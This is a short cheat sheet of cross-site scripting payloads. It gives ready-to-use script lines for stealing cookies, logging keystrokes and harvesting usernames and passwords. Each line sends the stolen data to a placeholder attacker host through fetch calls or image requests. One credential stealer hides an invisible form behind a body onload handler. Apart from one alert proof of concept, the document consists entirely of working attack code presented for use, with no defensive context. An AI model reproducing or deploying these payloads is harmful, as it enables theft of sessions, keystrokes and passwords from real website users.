#Cookie Stealer: 

```
<script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>
POC: <script>alert('1');</script>
Key Logger : <script>document.onkeypress = function(e) { fetch('https://{URL_OR_IP}/log?key=' + btoa(e.key) );}</script>
```


  Steal Creds:
  ''' #1
  </body>
  <body onload='stealCreds();'>
  <div style="opacity:0;">
    <form>
      <input type="text" name="username" id="username" />
      <input type="password" name="password" id="password" />
    </form>
    <script>
      function stealCreds(){
        var user = document.getElementById('username').value;
        var pass = document.getElementById('password').value;
        new Image().src="http://{URL_OR_IP}/login?u=" + user + "&p=" + pass;
      }
    </script>
  </div>
  '''
  '''#2
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://{URL_OR_IP}',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
''''
